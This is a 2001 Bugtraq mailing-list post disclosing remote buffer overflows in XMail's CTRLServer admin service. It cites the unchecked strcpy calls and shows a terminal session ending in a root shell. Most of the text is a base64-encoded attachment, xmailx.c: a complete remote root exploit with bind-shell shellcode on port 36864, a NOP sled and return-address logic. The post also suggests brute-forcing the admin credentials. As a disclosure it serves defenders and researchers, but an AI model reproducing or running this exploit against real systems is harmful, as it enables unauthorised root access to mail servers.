[18980] in bugtraq
XMail CTRLServer remote buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (isno)
Sat Feb 3 17:15:56 2001
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="=====_Dragon105726166357_====="
Message-ID: <20010202031410.C685D1CD70599@mail.etang.com>
Date: Fri, 2 Feb 2001 11:06:08 +0800
Reply-To: isno@etang.com
From: isno <isno@etang.com>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--=====_Dragon105726166357_=====
Content-Type: text/plain; charset="GB2312"
Content-Transfer-Encoding: 7bit
SUMMARY
I discovered all versions of XMail<http://www.mycio.com/davidel/xmail> have
buffer overflow vulnerabilities in CTRLServer.These holes is NOT same as
APOP,USER command buffer overflow vulnerability discovered beforetime.And
this problem allows a remote attacker to execute arbitrary code by issuing a
long cfgfileget(cfgfileset,domainadd,domaindel)command.
DETAILS
Vulnerable systems:
XMail version 0.66 and prior version
Immune systems:
None
CTRLServer is a tool of XMail for administering purpose.It listen on port 6017(tunable).
there are some bad programming lead to vulnerabilities.
In CTRLSvr.cpp
line 1888: CTRLDo_domainadd() function
StrLower(strcpy(szDomain, ppszTokens[1]));
szDomain is a 256 bytes local buffer,ppszTokens[1] is parsed from user input
command,XMail copies them without bounds checking.It is possible to cause
cover EIP,because XMail is run as root,an attacker can execute arbitrary code
with root privilege.
There are same vulnerabilities in CTRLSvr.cpp
line 1921: CTRLDo_domaindel() function
StrLower(strcpy(szDomain, ppszTokens[1]));
line 2448: CTRLDo_cfgfileget() function
strcpy(szRelativePath, ppszTokens[1]);
line 2523: CTRLDo_cfgfileset() function
strcpy(szRelativePath, ppszTokens[1]);
Before exploit the vulnerabilities,it is need to login with CTRLServer
username&password.I think it is easy to get that by brute forcing.
I wrote a program to test the vulnerabilities,on my Redhat 6.0 i386+XMail 0.65
(0.66 has same bugs):
[root@isno /root]# gcc -o xmailx xmailx.c
[root@isno /root]# ./xmailx isno mypasswd 127.0.0.1
Use retAddress: 0xbc7fe974
+00000 <981016616.25626@127.0.0.1> XMail 0.65 (Linux/Ix86) CTRL Server; Thu, 01 Feb 2001 16:36:56 +0800
Starting to login...
Success!now telnet 127.0.0.1 36864
[root@isno /root]# telnet 127.0.0.1 36864
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
id;
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
: command not found
Because the buffer is too small to set many of NOP before shellcode,it is deficult
to guess ret.And it cannot brute force offset,because once sending overflow code to
the CTRLServer, XMail will be crashed.
PATCH:
http://www.mycio.com/davidel/xmail should release the patch.
Excuse my poor english...
isno
isno@etang.com
--=====_Dragon105726166357_=====
Content-Type: application/octet-stream; name="xmailx.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="xmailx.c"
LyoKICogWE1haWwgQ1RSTFNlcnZlciByZW1vdGUgcm9vdCBleHBsb2l0IGZvciBsaW51eC94ODYK
ICoKICogQXV0aG9yOiBpc25vKGlzbm9AZXRhbmcuY29tKSwgMDEvMjAwMQogKgogKiBOT1RFOgog
KiAgQmVjYXVzZSB0aGUgYnVmZmVyIGlzIHRvbyBzbWFsbCB0byBzZXQgbWFueSBvZiBOT1AgYmVm
b3JlIHNoZWxsY29kZSxpdAogKiBpcyBkZWZpY3VsdCB0byBndWVzcyByZXQuQW5kIGl0IGNhbm5v
dCBicnV0ZSBmb3JjZSBvZmZzZXQsYmVjYXVzZSBvbmNlIAogKiBzZW5kaW5nIG92ZXJmbG93IGNv
ZGUgdG8gdGhlIENUUkxTZXJ2ZXIsIFhNYWlsIHdpbGwgYmUgY3Jhc2hlZC4KICoKICoKICogVGVz
dGVkIG9uOgogKiAgIFJlZEhhdCBMaW51eCA2LjAgaTM4NiBYTWFpbCAwLjY1CiAqCiAqIENvbXBp
bGU6CiAqICAgZ2NjIC1vIHhtYWlseCB4bWFpbHguYwogKiAKICogVXNhZ2U6CiAqICAgLi94bWFp
bHggdXNlcm5hbWUgcGFzc3dkIHRhcmdldGhvc3QgW29mZnNldF0KICogICBhbmQgdGVsbmV0IHRh
cmdldGhvc3QgMzY4NjQKICoKICovCgojaW5jbHVkZSA8c3RkaW8uaD4KI2luY2x1ZGUgPHN0cmlu
Zy5oPgojaW5jbHVkZSA8c3lzL3NvY2tldC5oPgojaW5jbHVkZSA8c3lzL3R5cGVzLmg+CiNpbmNs
dWRlIDxuZXRpbmV0L2luLmg+CiNpbmNsdWRlIDxuZXRkYi5oPgoKI2RlZmluZSBCU0laRQkJCTUx
MgojZGVmaW5lIFJFVEFERFJFU1MJCTB4YmM3ZmU5ODggICAgLyogbWF5YmUgMHhiZmZmZjlhNCBp
biBzb21lIGJveCAqLwojZGVmaW5lIE9GRlNFVAkJCTIwCiNkZWZpbmUgTk9QCQkJCTB4OTAKI2Rl
ZmluZSBQT1JUCQkJNjAxNwoKdm9pZCB1c2FnZShjaGFyICphcHApOwoKLyogIHNoZWxsY29kZSBi
aW5kIFRDUCBwb3J0IDM2ODY0ICAqLwpjaGFyIHNoZWxsY29kZVtdPQovKiBtYWluOiAqLwoiXHhl
Ylx4NzIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAvKiBqbXAgY2FsbHogICAgICAg
ICAgICAgICAqLwovKiBzdGFydDogKi8KIlx4NWUiICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgLyogcG9wbCAlZXNpICAgICAgICAgICAgICAgKi8KLyogc29ja2V0KCkgKi8KIlx4
MjlceGMwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogc3VibCAlZWF4LCAlZWF4
ICAgICAgICAgKi8KIlx4ODlceDQ2XHgxMCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgLyog
bW92bCAlZWF4LCAweDEwKCVlc2kpICAgKi8KIlx4NDAiICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgLyogaW5jbCAlZWF4ICAgICAgICAgICAgICAgKi8KIlx4ODlceGMzIiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogbW92bCAlZWF4LCAlZWJ4ICAgICAgICAgKi8K
Ilx4ODlceDQ2XHgwYyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogbW92bCAlZWF4LCAw
eDBjKCVlc2kpICAgKi8KIlx4NDAiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
LyogaW5jbCAlZWF4ICAgICAgICAgICAgICAgKi8KIlx4ODlceDQ2XHgwOCIgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgLyogbW92bCAlZWF4LCAweDA4KCVlc2kpICAgKi8KIlx4OGRceDRlXHgw
OCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogbGVhbCAweDA4KCVlc2kpLCAlZWN4ICAg
Ki8KIlx4YjBceDY2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLyogbW92YiAkMHg2
NiwgJWFsICAgICAgICAgKi8KIlx4Y2RceDgwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgLyogaW50ICQweDgwICAgICAgICAgICAgICAgKi8KLyogYmluZCgpICovCiJceDQzIiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGluY2wgJWVieCAgICAgICAgICAgICAg
ICovCiJceGM2XHg0Nlx4MTBceDEwIiAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4
MTAsIDB4MTAoJWVzaSkgICovCiJceDY2XHg4OVx4NWVceDE0IiAgICAgICAgICAgICAgICAgICAg
ICAgIC8qIG1vdncgJWJ4LCAweDE0KCVlc2kpICAgICovCiJceDg4XHg0Nlx4MDgiICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJWFsLCAweDA4KCVlc2kpICAgICovCiJceDI5XHhj
MCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIHN1YmwgJWVheCwgJWVheCAgICAg
ICAgICovCiJceDg5XHhjMiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmwg
JWVheCwgJWVkeCAgICAgICAgICovCiJceDg5XHg0Nlx4MTgiICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIC8qIG1vdmwgJWVheCwgMHgxOCglZXNpKSAgICovCiJceGIwXHg5MCIgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4OTAsICVhbCAgICAgICAgICovCiJceDY2
XHg4OVx4NDZceDE2IiAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdncgJWF4LCAweDE2KCVl
c2kpICAgICovCiJceDhkXHg0ZVx4MTQiICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGxl
YWwgMHgxNCglZXNpKSwgJWVjeCAgICovCiJceDg5XHg0ZVx4MGMiICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIC8qIG1vdmwgJWVjeCwgMHgwYyglZXNpKSAgICovCiJceDhkXHg0ZVx4MDgiICAg
ICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGxlYWwgMHgwOCglZXNpKSwgJWVjeCAgICovCiJc
eGIwXHg2NiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4NjYsICVh
bCAgICAgICAgICovCiJceGNkXHg4MCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8q
IGludCAkMHg4MCAgICAgICAgICAgICAgICovCi8qIGxpc3RlbigpICovCiJceDg5XHg1ZVx4MGMi
ICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmwgJWVieCwgMHgwYyglZXNpKSAgICov
CiJceDQzIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGluY2wgJWVieCAg
ICAgICAgICAgICAgICovCiJceDQzIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
IC8qIGluY2wgJWVieCAgICAgICAgICAgICAgICovCiJceGIwXHg2NiIgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4NjYsICVhbCAgICAgICAgICovCiJceGNkXHg4MCIg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGludCAkMHg4MCAgICAgICAgICAgICAg
ICovCi8qIGFjY2VwdCgpICovCiJceDg5XHg1Nlx4MGMiICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIC8qIG1vdmwgJWVkeCwgMHgwYyglZXNpKSAgICovCiJceDg5XHg1Nlx4MTAiICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC8qIG1vdmwgJWVkeCwgMHgxMCglZXNpKSAgICovCiJceGIwXHg2
NiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4NjYsICVhbCAgICAg
ICAgICovCiJceDQzIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGluY2wg
JWVieCAgICAgICAgICAgICAgICovCiJceGNkXHg4MCIgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIC8qIGludCAkMHg4MCAgICAgICAgICAgICAgICovCi8qIGR1cDIocywgMCk7IGR1cDIo
cywgMSk7IGR1cDIocywgMik7ICovCiJceDg2XHhjMyIgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIC8qIHhjaGdiICVhbCwgJWJsICAgICAgICAgICovCiJceGIwXHgzZiIgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgIC8qIG1vdmIgJDB4M2YsICVhbCAgICAgICAgICovCiJceDI5
XHhjOSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIHN1YmwgJWVjeCwgJWVjeCAg
ICAgICAgICovCiJceGNkXHg4MCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGlu
dCAkMHg4MCAgICAgICAgICAgICAgICovCiJceGIwXHgzZiIgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIC8qIG1vdmIgJDB4M2YsICVhbCAgICAgICAgICovCiJceDQxIiAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGluY2wgJWVjeCAgICAgICAgICAgICAgICovCiJc
eGNkXHg4MCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGludCAkMHg4MCAgICAg
ICAgICAgICAgICovCiJceGIwXHgzZiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8q
IG1vdmIgJDB4M2YsICVhbCAgICAgICAgICovCiJceDQxIiAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgIC8qIGluY2wgJWVjeCAgICAgICAgICAgICAgICovCiJceGNkXHg4MCIgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGludCAkMHg4MCAgICAgICAgICAgICAgICov
Ci8qIGV4ZWN2ZSgpICovCiJceDg4XHg1Nlx4MDciICAgICAgICAgICAgICAgICAgICAgICAgICAg
IC8qIG1vdmIgJWRsLCAweDA3KCVlc2kpICAgICovCiJceDg5XHg3Nlx4MGMiICAgICAgICAgICAg
ICAgICAgICAgICAgICAgIC8qIG1vdmwgJWVzaSwgMHgwYyglZXNpKSAgICovCiJceDg3XHhmMyIg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIHhjaGdsICVlc2ksICVlYnggICAgICAg
ICovCiJceDhkXHg0Ylx4MGMiICAgICAgICAgICAgICAgICAgICAgICAgICAgIC8qIGxlYWwgMHgw
YyglZWJ4KSwgJWVjeCAgICovCiJceGIwXHgwYiIgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgIC8qIG1vdmIgJDB4MGIsICVhbCAgICAgICAgICovCiJceGNkXHg4MCIgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgIC8qIGludCAkMHg4MCAgICAgICAgICAgICAgICovCi8qIGNhbGx6
OiAqLwoiXHhlOFx4ODlceGZmXHhmZlx4ZmYiICAgICAgICAgICAgICAgICAgICAvKiBjYWxsIHN0
YXJ0ICAgICAgICAgICAgICAqLwoiL2Jpbi9zaCI7Ci8qICAxMjggYnl0ZXMgICovCgppbnQgbWFp
bihpbnQgYXJnYywgY2hhciAqYXJndltdKQp7CgljaGFyIGJ1ZmZbQlNJWkUrMV07CgljaGFyIHNl
bmRidWZbNjAwXT0iY2ZnZmlsZWdldFx0IjsKCWNoYXIgbG9naW5idWZbMjAwXTsKCWNoYXIgcmN2
YnVmWzEwMjRdOwoJY2hhciAqdXNlcm5hbWU7CgljaGFyICpwYXNzd29yZDsKCWNoYXIgKnRhcmdl
dDsKCWludCBpOwoJaW50IG5vcHJhbmdlOwoJaW50IG9mZnNldD1PRkZTRVQ7Cgl1X2xvbmcgc3A9
UkVUQUREUkVTUzsKCXVfbG9uZyBhZGRyOwoKCWludCBza3Q7Cglsb25nIGluZXQ7CglzdHJ1Y3Qg
aG9zdGVudCAqaG9zdDsKICAgIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47CgogICAgaWYoYXJnYzw0
KQoJewoJCXVzYWdlKGFyZ3ZbMF0pOwoJCXJldHVybiAxOwoJfQoJCiAgICB1c2VybmFtZSA9IGFy
Z3ZbMV07CiAgICBwYXNzd29yZCA9IGFyZ3ZbMl07CiAgICB0YXJnZXQgPSBhcmd2WzNdOwogICAg
aWYoYXJnYz40KQoJewoJCW9mZnNldCA9IGF0b2koYXJndls0XSk7Cgl9CgoJYWRkcj1zcCAtIChs
b25nKW9mZnNldDsKCW5vcHJhbmdlPTI1Nis0LXN0cmxlbihzaGVsbGNvZGUpOwoJbWVtc2V0KGJ1
ZmYsIE5PUCwgQlNJWkUpOwoJbWVtY3B5KGJ1ZmYrKGxvbmcpbm9wcmFuZ2UsIHNoZWxsY29kZSwg
c3RybGVuKHNoZWxsY29kZSkpOwoJZm9yIChpID0gMjU2KzQ7IGkgPCBCU0laRTsgaSArPSA0KQog
ICAgICAgICAgKigoaW50ICopICZidWZmW2ldKSA9IGFkZHI7CgoJYnVmZltCU0laRV09J1wwJzsK
CglmcHJpbnRmKHN0ZGVyciwgIlxuVXNlIHJldEFkZHJlc3M6IDB4JTA4eFxuXG4iLGFkZHIpOwoK
CXN0cmNhdChzZW5kYnVmLCBidWZmKTsKCXN0cmNhdChzZW5kYnVmLCAiXHJcbiIpOwoJc3RyY3B5
KGxvZ2luYnVmLHVzZXJuYW1lKTsKCXN0cmNhdChsb2dpbmJ1ZiwiXHQiKTsgICAgICAvKiBjb21t
YW5kIHNob3VsZCBzcGxpdHRlZCBieSBUQUIgKi8KCXN0cmNhdChsb2dpbmJ1ZixwYXNzd29yZCk7
CglzdHJjYXQobG9naW5idWYsIlxyXG4iKTsKCglza3QgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19T
VFJFQU0sIDApOwoJaWYoc2t0ID09IDApCiAgICB7CiAgICAgIHBlcnJvcigic29ja2V0KCkiKTsK
ICAgICAgZXhpdCgtMSk7CiAgICB9CgogICAgaW5ldCA9IGluZXRfYWRkcih0YXJnZXQpOwoJaWYo
aW5ldCA9PSAtMSkKICAgIHsKICAgICAgaWYoaG9zdCA9IGdldGhvc3RieW5hbWUodGFyZ2V0KSkK
CSAgICBtZW1jcHkoJmluZXQsIGhvc3QtPmhfYWRkciwgNCk7CiAgICAgIGVsc2UKCQlpbmV0ID0g
LTE7CiAgICAgIGlmKGluZXQgPT0gLTEpCgkJewoJCQlmcHJpbnRmKHN0ZGVyciwgIkNhbnQgcmVz
b2x2ICVzISFcbiIsIHRhcmdldCk7CgkJCWV4aXQgKC0xKTsKCQl9CiAgICB9CglzaW4uc2luX2Zh
bWlseSA9IFBGX0lORVQ7CiAgICBzaW4uc2luX3BvcnQgPSBodG9ucyhQT1JUKTsKICAgIHNpbi5z
aW5fYWRkci5zX2FkZHIgPSBpbmV0OwoJaWYgKGNvbm5lY3QgKHNrdCwgKHN0cnVjdCBzb2NrYWRk
ciAqKSZzaW4sIHNpemVvZihzaW4pKSA8IDApCiAgICB7CiAgICAgIHBlcnJvcigiQ29ubmVjdCgp
Iik7CiAgICAgIGV4aXQoLTEpOwogICAgfQoJcmVhZChza3QsIHJjdmJ1ZiwgMTAyNCk7CglmcHJp
bnRmKHN0ZGVyciwgIiVzXG4iLCByY3ZidWYpOwoJbWVtc2V0KHJjdmJ1ZiwgMHgwLCAxMDI0KTsK
CWZwcmludGYoc3RkZXJyLCAiU3RhcnRpbmcgdG8gbG9naW4uLi5cbiIpOwoJd3JpdGUoc2t0LCBs
b2dpbmJ1Ziwgc3RybGVuKGxvZ2luYnVmKSk7CglzbGVlcCgxKTsKCXJlYWQoc2t0LCByY3ZidWYs
IDEwMjQpOwoJaWYoc3Ryc3RyKHJjdmJ1ZiwiMDAwMDAiKT09TlVMTCkKCXsKCQlwZXJyb3IoIkxv
Z2luIGZhaWxlZCEiKTsKCQlleGl0KC0xKTsKCX0KCXdyaXRlKHNrdCwgc2VuZGJ1Ziwgc3RybGVu
KHNlbmRidWYpKTsKCWNsb3NlKHNrdCk7CgoJZnByaW50ZihzdGRlcnIsICJTdWNjZXNzIW5vdyB0
ZWxuZXQgJXMgMzY4NjRcbiIsIHRhcmdldCk7CglyZXR1cm4gMTsKfQoKdm9pZCB1c2FnZShjaGFy
ICphcHApCnsKICBmcHJpbnRmKHN0ZGVyciwgIlxuWE1haWwgMC42NS8wLjY2IENUUkxTdnIgZXhw
bG9pdFxuXG4iKTsKICBmcHJpbnRmKHN0ZGVyciwgIlVzYWdlOiAlcyB1c2VybmFtZSBwYXNzd2Qg
dGFyZ2V0aG9zdCBbb2Zmc2V0XVxuXG4iLCBhcHApOwogIHJldHVybjsKfQoKCgoKCgoK
--=====_Dragon105726166357_=====--
